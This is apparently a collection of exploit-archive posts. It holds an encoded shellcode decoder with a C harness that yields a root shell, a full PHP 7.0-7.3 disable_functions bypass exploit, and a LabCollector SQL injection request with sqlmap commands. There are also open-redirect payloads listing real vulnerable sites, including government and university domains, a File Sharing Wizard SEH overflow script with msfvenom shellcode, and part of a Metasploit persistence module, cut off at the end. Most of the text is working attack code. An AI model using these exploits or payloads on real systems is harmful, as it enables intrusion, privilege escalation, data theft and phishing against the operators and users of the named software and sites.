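    xor eax, eax            ; EAX = read offset
    xor ebx, ebx

switch:

    mov bl, byte [esi + eax]
    cmp bl, 0xaa            ; end marker -> jump into the decoded payload
    jz shellcode
    cmp bl, 0xbb            ; 0xbb -> XOR-encoded, anything else -> NOT-encoded
    jz xordecode
    jmp notdecode

xordecode:

    mov bl, byte [esi + eax + 1]
    mov byte [edi], bl
    xor byte [edi], 0xDD    ; same key as encoder_mixer.py
    inc edi
    ; Only AL is advanced: the read offset wraps after 255, so the encoded
    ; stream (3 bytes per payload byte + terminator) must stay under 256 bytes.
    add al, 3
    jmp short switch

notdecode:

    mov bl, byte [esi + eax + 1]
    mov byte [edi], bl
    not byte [edi]
    inc edi
    add al, 3
    jmp short switch

call_decoder:

    call decoder
; Encoded execve payload produced by encoder_mixer.py (the original listing
; had a stray line break after `db`, which NASM does not accept).
shellcode: db 0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa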

############################### shellcode ############################

$ nasm -f elf32 decoder_mixer.asm
$ ld -N -o decoder decoder_mixer.o
$ objdump -d ./decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa"

## Put the hex code in a C script

root@root:# cat shellcode.c
#include<stdio.h>
#include<string.h>

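/* Shellcode under test: the decoder_mixer stub followed by the encoded execve
 * payload. The stub decodes in place, i.e. it writes into this array, so the
 * memory holding `code` must be writable AND executable. The build line below
 * relies on `-z execstack` for that; on toolchains/kernels where an executable
 * stack no longer implies an executable data segment this may segfault. */
unsigned char code[] =
"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa";

/* Test harness: report the length and jump into the buffer. `int main(void)`
 * and `%zu` replace the original's non-standard `void main()` / `%d` with a
 * size_t argument. Does not return if the payload's execve() succeeds. */
int main(void)
{
    /* strlen() stops at the first NUL; the encoder does not guarantee a
     * NUL-free stream, so a mismatch here means the payload was truncated. */
    size_t len = strlen((const char *)code);
    printf("Shellcode Length: %zu\n", len);
    if (len != sizeof(code) - 1) {
        fprintf(stderr, "warning: shellcode contains a NUL byte (%zu of %zu bytes reachable)\n",
                len, sizeof(code) - 1);
    }

    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}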



root@root# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@root# ./shellcode
Shellcode Length: 132
# whoami
root
# exit

PHP 7.3 disable_functions Bypass


PHP versions 7.0 through 7.3 disable_functions proof of concept exploit.


MD5 | 2888c130ca690ceaa4e27957b0283985

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
#
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {
global $abc, $helper;

function str2ptr(&$str, $p = 0, $s = 8) {
    // Read an $s-byte little-endian unsigned integer from $str at offset $p.
    // Walks from the most significant byte down so each step shifts the
    // accumulator left by one byte. Offsets past the end read as 0 (PHP
    // yields "" for them and ord("") is 0), like the original loop.
    $value = 0;
    $idx = $p + $s - 1;
    while ($idx >= $p) {
        $value = ($value << 8) | ord($str[$idx]);
        $idx--;
    }
    return $value;
}

function ptr2str($ptr, $m = 8) {
    // Serialize the low $m bytes of $ptr as a little-endian byte string
    // (least significant byte first). Used both to write pointers and, with
    // $m = 79 and $ptr = 0, to make a zero-filled string of a chosen size.
    $out = '';
    while ($m-- > 0) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

function write(&$str, $p, $v, $n = 8) {
    // Overwrite $n bytes of $str starting at offset $p with $v, little-endian.
    // $str is taken by reference: this is the primitive that edits the
    // reclaimed buffer ($abc) in place.
    $end = $p + $n;
    for ($pos = $p; $pos < $end; $pos++, $v >>= 8) {
        $str[$pos] = chr($v & 0xff);
    }
}

function leak($addr, $p = 0, $s = 8) {
    // Arbitrary read primitive. Slot 0x68 of the controlled buffer is
    // presumably the pointer of the fake string that $helper->a resolves
    // to; pointing it at $addr + $p - 0x10 makes strlen($helper->a) return
    // the 8 bytes at $addr + $p (0x10 looks like the offset of the length
    // field inside a zend_string -- verify against the PHP version in use).
    global $abc, $helper;
    $fake_string = $addr + $p - 0x10;
    write($abc, 0x68, $fake_string);
    $value = strlen($helper->a);
    if ($s == 8) {
        return $value;
    }
    // Narrow to the low $s bytes: 2 << ($s*8 - 1) == 2^($s*8).
    return $value % (2 << ($s * 8 - 1));
}

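function parse_elf($base) {
    // Walk the ELF64 program headers of the binary loaded at $base through
    // the leak primitive and pick out the RW PT_LOAD segment (scanned later
    // by get_basic_funcs()) and the size of the RX PT_LOAD segment.
    // Returns [data_addr, text_size, data_size], or false if any is missing.
    $e_type = leak($base, 0x10, 2);          // 2 = ET_EXEC, otherwise assumed PIE (ET_DYN)

    $e_phoff = leak($base, 0x20);
    $e_phentsize = leak($base, 0x36, 2);
    $e_phnum = leak($base, 0x38, 2);

    // Initialised explicitly: the original left these undefined when no
    // matching segment was found, so the check at the bottom raised
    // "undefined variable" notices instead of cleanly returning false.
    $data_addr = 0;
    $data_size = 0;
    $text_size = 0;

    for($i = 0; $i < $e_phnum; $i++) {
        $header = $base + $e_phoff + $i * $e_phentsize;
        $p_type = leak($header, 0, 4);
        $p_flags = leak($header, 4, 4);
        $p_vaddr = leak($header, 0x10);
        $p_memsz = leak($header, 0x28);

        if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_R|PF_W
            # ET_EXEC carries absolute vaddrs; a PIE's are relative to the load base.
            $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
            $data_size = $p_memsz;
        } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_R|PF_X
            $text_size = $p_memsz;
        }
    }

    if(!$data_addr || !$text_size || !$data_size)
        return false;

    return [$data_addr, $text_size, $data_size];
}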

function get_basic_funcs($base, $elf) {
    // Scan the RW segment for the basic_functions[] zend_function_entry
    // table: its first entry is named "constant" and the next one (0x20
    // bytes later, i.e. 4 slots) "bin2hex". A candidate name pointer must
    // land inside the first $text_size bytes of the binary before it is
    // dereferenced. Returns the table address, or null if nothing matches.
    list($data_addr, $text_size, $data_size) = $elf;
    $n_slots = $data_size / 8;
    for ($slot = 0; $slot < $n_slots; $slot++) {
        $name_ptr = leak($data_addr, $slot * 8);
        if ($name_ptr - $base <= 0 || $name_ptr - $base >= $text_size) {
            continue;
        }
        if (leak($name_ptr) != 0x746e6174736e6f63) {   // "constant" read as LE qword
            continue;
        }

        $name_ptr = leak($data_addr, ($slot + 4) * 8);
        if ($name_ptr - $base <= 0 || $name_ptr - $base >= $text_size) {
            continue;
        }
        if (leak($name_ptr) != 0x786568326e6962) {     // "bin2hex\0" read as LE qword
            continue;
        }

        return $data_addr + $slot * 8;
    }
}

function get_binary_base($binary_leak) {
    // Page-align a pointer known to lie inside the PHP binary and walk back
    // one page at a time until the ELF magic appears. 0x10102464c457f is
    // "\x7fELF\x02\x01\x01" (ELF64, little-endian, version 1) read as a
    // 7-byte LE integer. Gives up (null) after 0x1000 pages.
    // NOTE: 0xfffffffffffff000 exceeds PHP_INT_MAX and is parsed as a float;
    // the mask only works because PHP's float-to-int conversion wraps it to
    // -0x1000 -- verify on the interpreter you run this from.
    $page = $binary_leak & 0xfffffffffffff000;
    $lowest = $page - 0x1000 * 0x1000;
    for ($addr = $page; $addr > $lowest; $addr -= 0x1000) {
        if (leak($addr, 0, 7) == 0x10102464c457f) {
            return $addr;
        }
    }
}

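function get_system($basic_funcs) {
    // Walk the zend_function_entry table from $basic_funcs (0x20 bytes per
    // entry, judging by the stride) until an entry whose fname starts with
    // "system" is found and return its handler pointer, which sits 8 bytes
    // after fname (the address of zif_system). The table ends with an entry
    // whose fname is NULL; returns false when that is reached first.
    $entry = $basic_funcs;
    while (true) {
        $fname_ptr = leak($entry);
        // The original dereferenced fname before testing for the terminator,
        // i.e. it called leak(0 - 0x10) on the last entry; test first.
        if ($fname_ptr == 0) {
            return false;
        }
        if (leak($fname_ptr, 0, 6) == 0x6d6574737973) {   // "system" read as 6-byte LE
            return leak($entry + 8);
        }
        $entry += 0x20;
    }
}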

class ryat {
    // Unserialize gadget for bug #72530 (see header). The PoC payload makes
    // $ryat a reference (R:3) into the outer array; on destruction that value
    // is copied into $chtg and $ryat is overwritten. Property order is kept
    // as in the original because it fixes the object's slot layout.
    public $ryat;
    public $chtg;

    public function __destruct() {
        $this->chtg = $this->ryat;
        $this->ryat = 1;
    }
}

class Helper {
    // Plain object whose property slots are reinterpreted by the exploit:
    // $a is what leak() calls strlen() on and $b holds the closure that gets
    // hijacked. Declaration order determines the slot layout, so keep it.
    public $a;
    public $b;
    public $c;
    public $d;
}

if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}

$n_alloc = 10; # increase this value if you get segfaults

$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_repeat('A', 79);

$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
$out = unserialize($poc);
gc_collect_cycles();

$v = [];
$v[0] = ptr2str(0, 79);
unset($v);
$abc = $out[2][0];

$helper = new Helper;
$helper->b = function ($x) { };

if(strlen($abc) == 79) {
die("UAF failed");
}

# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;

# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);

# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);

$closure_obj = str2ptr($abc, 0x20);

$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}

if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}

if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}

if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}

# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}

# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

($helper->b)($cmd);

exit();
}


LabCollector 5.423 SQL Injection


LabCollector version 5.423 suffers from a remote SQL injection vulnerability.


MD5 | 9544cc6a3f598df0468c1d7e6829fbda

# Exploit Title: LabCollector (Laboratory Information System) 5.423 - Multiples SQL Injection
# Date: 09/09/2019
# Software Links/Project: https://www.labcollector.com/clientarea/downloads.php
# Version: LabCollector (Laboratory Information System) 5.423
# Exploit Author: Carlos Avila
# Category: webapps
# Tested on: Debian 9 / Win10
# Contact: http://twitter.com/badboy_nt

1. Description

LabCollector Lab Services Manager (LSM) is a network based application that helps laboratories, core facilities, biotechs providing services to clients or partners to keep track of samples arriving for processing, track status and generate reports. Billing management is also possible. LSM is a simple and complete lab services LIMS software. Totally configurable by the user, it can be adapted to any situation.

This allows an unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Valid admin or user credentials aren't required. Deeper analysis shows that other pages are also affected by the vulnerability through other inputs.

It is written in PHP and is vulnerable to SQL injection in multiple places. The affected parameters are detailed below:

http://192.168.0.102/labcollector/html/login.php [parameters affected via POST method: login]
http://192.168.0.102/labcollector/html/retrieve_password.php (parameters affected via POST method: user_name)



2. Proof of Concept


----------------------------------------------------------------------------------------------------------------------------------
Post Request:

POST /labcollector/html/login.php HTTP/1.1
Host: 192.168.0.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
DNT: 1
Connection: close
Referer: http://192.168.0.102/labcollector/html/login.php
Cookie: PHPSESSID=cio2kpq89f4da0b1fhakfn68k7
Upgrade-Insecure-Requests: 1

login=test&pass=hola&action=login&Submit=Sign+In

----------------------------------------------------------------------------------------------------------------------------------

All tests have been performed in a controlled and local environment.

sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin --random-agent --tamper randomcase -p login --dbms mysql --dbs




sunday:sqlmap badboy_nt$ python sqlmap.py -r SQLI-LabCollectorLogin2 --random-agent --tamper randomcase -p user_name --dbms mysql -f



3. Solution:

Application inputs must be validated correctly throughout the development of the project; for example, the `login` and `user_name` values above should reach the database only through parameterized (prepared) queries rather than string concatenation.

Android Binder Driver Use-After-Free

ParantezTeknoloji Library Software 16.0519000 Open Redirection


ParantezTeknoloji Library Software version 16.0519000 suffers from an open redirection vulnerability.


MD5 | 35591f3461ccac86a7ae618520b0e965

####################################################################

# Exploit Title : ParantezTeknoloji Library Software 16.0519000 Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : parantezteknoloji.com.tr
# Software Affected Versions and Download Links :
Koha 3.2000000
download.koha-community.org/old_releases/koha-3.20.00.tar.gz
Koha 16.0519000
download.koha-community.org/old_releases/koha-16.05.19.tar.gz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Parantez Teknoloji inurl:/cgi-bin/koha/ site:tr
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
ParantezTeknoloji Library Software accepts a user-controlled input that specifies
a link to an external site, and uses that link in a Redirect. This simplifies phishing
attacks. An http parameter may contain a URL value and could cause the web
application to redirect the request to the specified URL. By modifying the URL
value to a malicious site, an attacker may successfully launch a phishing scam and
steal user credentials. Because the server name in the modified link is identical to the
original site, phishing attempts have a more trustworthy appearance. Open redirect is a
failure in that process that makes it possible for attackers to steer users to malicious
websites. This vulnerability is used in phishing attacks to get users to visit malicious
sites without realizing it. Web users often encounter redirection when they visit the
Web site of a company whose name has been changed or which has been acquired by
another company. When a user visits such a fake page, their computer can be infected
with malware designed to deceive the user and steal their personal data.

####################################################################

# Vulnerable File :
*****************
/tracklinks.pl

# Vulnerable Parameters :
***********************
?uri=//

?biblionumber=[ID-NUMBER]&uri=//

# Open Redirection Exploit :
**************************
/cgi-bin/koha/tracklinks.pl?uri=//[REDIRECT-ADDRESS-HERE].gov

/cgi-bin/koha/tracklinks.pl?biblionumber=[ID-NUMBER]&uri=//[REDIRECT-ADDRESS-HERE].gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] 94.55.127.94/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] kutuphane.jaletezer.k12.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Devinim Library Software 19.0504000 Open Redirection


Devinim Library Software version 19.0504000 suffers from an open redirection vulnerability.


MD5 | 23489226db9323936e525207a81efad5

####################################################################

# Exploit Title : Devinim Library Software 19.0504000 Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/10/2019
# Vendor Homepage : devinim.com.tr
# Software Affected Versions and Download Links :
Koha 16.1104000
download.koha-community.org/old_releases/koha-16.11.04.tar.gz
Koha 18.0503000
download.koha-community.org/old_releases/koha-18.05.03.tar.gz
Koha 18.0504000
download.koha-community.org/old_releases/koha-18.05.04.tar.gz
Koha 19.0504000
download.koha-community.org/koha-19.05.04.tar.gz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Bu yazýlým Devinim Yazýlým Eðitim Danýþmanlýk tarafýndan geliþtirilip kurulmuþtur.
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Devinim Software accepts a user-controlled input that specifies
a link to an external site, and uses that link in a Redirect. This simplifies phishing
attacks. An http parameter may contain a URL value and could cause the web
application to redirect the request to the specified URL. By modifying the URL
value to a malicious site, an attacker may successfully launch a phishing scam and
steal user credentials. Because the server name in the modified link is identical to the
original site, phishing attempts have a more trustworthy appearance. Open redirect is a
failure in that process that makes it possible for attackers to steer users to malicious
websites. This vulnerability is used in phishing attacks to get users to visit malicious
sites without realizing it. Web users often encounter redirection when they visit the
Web site of a company whose name has been changed or which has been acquired by
another company. When a user visits such a fake page, their computer can be infected
with malware designed to deceive the user and steal their personal data.

####################################################################

# Vulnerable File :
*****************
/tracklinks.pl

# Vulnerable Parameters :
***********************
?uri=//

?biblionumber=[ID-NUMBER]&uri=//

# Open Redirection Exploit :
**************************
/cgi-bin/koha/tracklinks.pl?uri=//[REDIRECT-ADDRESS-HERE].gov

/cgi-bin/koha/tracklinks.pl?biblionumber=[ID-NUMBER]&uri=//[REDIRECT-ADDRESS-HERE].gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] koha.devinim.com.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] imrenahmettuzunkutuphanesi.org/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] ekatalog.nevsehir.edu.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] katalogtarama.cekulvakfi.org.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] boratavkutuphane.kulturturizm.gov.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] koha.gidatarim.edu.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

[+] kutuphane.pendik.bel.tr/cgi-bin/koha/tracklinks.pl?uri=//cxsecurity.com

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

File Sharing Wizard 1.5.0 DELETE SEH Buffer Overflow


File Sharing Wizard version 1.5.0 with build date 26-8-2008 DELETE SEH buffer overflow exploit.


MD5 | a86c8312a605c7155a37d94016a4eb24

import socket
from struct import *

# Exploit Title: File sharing wizard 'DELETE' remote SEH overflow
# Date: 10/4/2019
# Exploit Author: Striker
# Vendor Homepage: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0 Build on 26-8-2008
# Tested on: Windows 7


# File-sharing-wizard-seh

# Address and port of the File Sharing Wizard HTTP listener used in the PoC.
host = "10.0.2.7"
port = 80

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed -f python

# Shellcode emitted by the msfvenom command above (x86/alpha_mixed encoding,
# windows/exec CMD=calc.exe); it is appended to the request unchanged.
buf = b""
buf += b"\x89\xe7\xd9\xc2\xd9\x77\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x7a\x48\x6b"
buf += b"\x32\x55\x50\x53\x30\x57\x70\x43\x50\x4f\x79\x6a\x45"
buf += b"\x50\x31\x79\x50\x33\x54\x4e\x6b\x66\x30\x54\x70\x6c"
buf += b"\x4b\x71\x42\x34\x4c\x6e\x6b\x70\x52\x64\x54\x6c\x4b"
buf += b"\x34\x32\x67\x58\x66\x6f\x58\x37\x70\x4a\x77\x56\x46"
buf += b"\x51\x4b\x4f\x6e\x4c\x47\x4c\x31\x71\x61\x6c\x46\x62"
buf += b"\x76\x4c\x67\x50\x7a\x61\x38\x4f\x64\x4d\x37\x71\x68"
buf += b"\x47\x49\x72\x4c\x32\x70\x52\x61\x47\x6e\x6b\x73\x62"
buf += b"\x72\x30\x6c\x4b\x31\x5a\x45\x6c\x6e\x6b\x72\x6c\x34"
buf += b"\x51\x71\x68\x4b\x53\x61\x58\x53\x31\x78\x51\x52\x71"
buf += b"\x4e\x6b\x50\x59\x75\x70\x53\x31\x7a\x73\x4e\x6b\x57"
buf += b"\x39\x75\x48\x6a\x43\x74\x7a\x67\x39\x4e\x6b\x76\x54"
buf += b"\x4e\x6b\x63\x31\x59\x46\x56\x51\x59\x6f\x4c\x6c\x49"
buf += b"\x51\x78\x4f\x34\x4d\x33\x31\x58\x47\x50\x38\x39\x70"
buf += b"\x32\x55\x79\x66\x37\x73\x33\x4d\x68\x78\x67\x4b\x63"
buf += b"\x4d\x57\x54\x70\x75\x6b\x54\x46\x38\x4c\x4b\x73\x68"
buf += b"\x47\x54\x56\x61\x79\x43\x35\x36\x4e\x6b\x56\x6c\x72"
buf += b"\x6b\x6c\x4b\x31\x48\x47\x6c\x36\x61\x6e\x33\x4c\x4b"
buf += b"\x75\x54\x6c\x4b\x37\x71\x5a\x70\x6d\x59\x50\x44\x34"
buf += b"\x64\x55\x74\x33\x6b\x43\x6b\x70\x61\x31\x49\x53\x6a"
buf += b"\x73\x61\x49\x6f\x79\x70\x53\x6f\x61\x4f\x51\x4a\x6c"
buf += b"\x4b\x77\x62\x7a\x4b\x4e\x6d\x31\x4d\x53\x5a\x65\x51"
buf += b"\x4c\x4d\x6c\x45\x48\x32\x35\x50\x57\x70\x47\x70\x70"
buf += b"\x50\x45\x38\x45\x61\x4e\x6b\x62\x4f\x4c\x47\x6b\x4f"
buf += b"\x7a\x75\x6d\x6b\x4c\x30\x68\x35\x4d\x72\x46\x36\x50"
buf += b"\x68\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x6b\x4f\x78\x55"
buf += b"\x77\x4c\x45\x56\x51\x6c\x56\x6a\x6f\x70\x49\x6b\x4d"
buf += b"\x30\x50\x75\x46\x65\x4d\x6b\x33\x77\x66\x73\x53\x42"
buf += b"\x62\x4f\x43\x5a\x75\x50\x53\x63\x39\x6f\x4e\x35\x62"
buf += b"\x43\x53\x51\x62\x4c\x63\x53\x76\x4e\x35\x35\x61\x68"
buf += b"\x62\x45\x33\x30\x41\x41"

# The request line: an overlong DELETE target overflows a stack buffer and
# overwrites the SEH record (next-SEH pointer followed by the handler).
payload = "DELETE "
payload += "A" * 1040 # junk (bytes up to the SEH record)
payload += "\x90\x90\xeb\x16" # JMP short over SEH (nSEH: two NOPs, then `jmp short +0x16`)
payload += "\xb5\xbb\x37\x7c" # POP POP RET (SEH handler; address inside MSVCR71.dll, see next line)
# 0x7c37bbb5 : pop ecx # pop ecx # ret 0x08 | {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)
payload += "\x90" * 50 # NOP sled the short jump lands in
payload += buf # shellcode
payload += "D" *(5000 - len(payload)) # pad the request line to exactly 5000 bytes
payload += " HTTP/1.1\r\n\r\n"

# Detection note: a single ~5 KB "DELETE" request line consisting almost
# entirely of repeated 'A'/'D' bytes and a NOP run is a strong network
# signature for this PoC; the bundled MSVCR71.dll without SafeSEH/ASLR is
# the property that makes the SEH overwrite usable.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload)
s.close()


Microsoft Windows Silent Process Exit Persistence


This Metasploit module uploads a payload and declares that it is the debug process to launch when a specified process exits.


MD5 | f082809fe67aa161ddba42a5e4eda1db

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/exploit/exe'

# Local persistence module: registers the uploaded payload as the
# "monitor process" that Windows launches when IMAGE_FILE exits, via the
# Image File Execution Options / SilentProcessExit registry keys.
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Windows::Registry
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv

# Module metadata and user options. DisablePayloadHandler is set because the
# payload only runs later, when the watched process exits.
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Silent Process Exit Persistence',
'Description' => %q(
Windows allows you to set up a debug process when a process exits.
This module uploads a payload and declares that it is the debug
process to launch when a specified process exits.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Mithun Shanbhag', # earliest author found
'bwatters-r7', # msf module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' =>
[
[ 'Automatic', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Jun 28 2008",
'References' =>
[
['URL', 'https://attack.mitre.org/techniques/T1183/'],
['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true'
}
))
register_options([
# Payload file name on the target; a random alphabetic name when unset.
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
# Directory the payload is written to; the session's %TEMP% when unset.
OptString.new('PATH', [false, 'Path to write payload(%TEMP% by default).', nil]),
# Image name (as it appears under IFEO) whose exit launches the payload.
OptString.new('IMAGE_FILE', [true, 'Binary to "debug"', nil])

])
end

# Generates the payload executable and writes it to dest_pathname on the
# target. Only logs the result; write_file's return value is not checked.
def upload_payload(dest_pathname)
payload_exe = generate_payload_exe
write_file(dest_pathname, payload_exe)
vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{dest_pathname}")
end

# Aborts unless the session runs as SYSTEM (the HKLM writes below need
# that), then probes the session with sysinfo so an unreachable session
# fails early.
def validate_active_host
unless is_system?
fail_with(Failure::NoAccess, "You must be System to run this Module")
end

begin
print_status("Attempting Persistence on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end

# Writes the three registry values that make Windows start payload_pathname
# when image_file exits:
#   IFEO\<image_file>\GlobalFlag (REG_DWORD) = 512 (0x200), the flag that
#     enables silent-process-exit monitoring for that image;
#   SilentProcessExit\<image_file>\ReportingMode (REG_DWORD) = 1, which
#     selects launching the monitor process;
#   SilentProcessExit\<image_file>\MonitorProcess (REG_SZ) = payload path.
# Each value is read back after writing; on the first failure the method
# prints an error and returns false. On success it returns the value of
# reg_keys.each (the array itself, which is truthy) rather than an explicit
# true, and #exploit relies on that truthiness.
# Detection note: creation of these SilentProcessExit / IFEO GlobalFlag
